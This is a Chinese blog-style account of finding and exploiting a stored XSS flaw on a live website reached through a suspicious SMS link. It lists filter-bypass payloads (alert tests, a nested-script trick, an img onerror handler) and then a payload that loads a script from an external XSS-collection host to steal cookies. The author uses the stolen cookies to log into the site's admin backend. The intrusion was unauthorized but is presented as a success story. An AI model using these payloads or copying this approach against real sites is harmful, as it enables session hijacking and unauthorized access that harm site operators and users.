起因
前几天上课的时候,忽然收到一条短信
打开网址如下:
既然我有如此“运气”,就让我看看葫芦里卖的什么药吧!
过程
测试
随手x了一句
<script>alert(1)</script>
发现报错了,我以为是对“script整个标签”进行了过滤(后来发现仅仅是对script进行过滤),然后就进行继续尝试。
<scr<script>ipt>alert(1)</scr<script>ipt>
发现还是报错,然后考虑是不是只过滤script这个字符串,然后考虑用img标签进行尝试。
<img src="#" onerror="alert(1)">
然后出现了我等待已久的弹窗
绕过
然后中午回去准备添加盗取cookies的代码,结果发现怎么都过不去,有一个点一直想不通,就是不知道对方到底过滤了什么,然后js填进去一直报错,我就一直想不通怎么在onerror事件里面让js生效,后来请教了好多人,得到的结果一直是没办法,这个没什么可x的,得不到什么结果,然后就放在一旁了,结果今天在论天逛的时候,发现了Black-Hole他的一篇文章里面提到了
<img src=xonerror=appendChild(createElement ('script')).src='http://xss.0exp.cn/VdYVBx?1448952953'/>
然后显示订单成功
得到cookies
打进去以后不一会,就收到cookies了
登陆后台
然后就拖入老兵,进行访问。
最后想说
本文只做个人技术总结,并无宣扬对厂商造成破坏之意,且本漏洞已提交至乌云并已公开:
如有不妥之处,请联系我,必将配合删除,至此告之。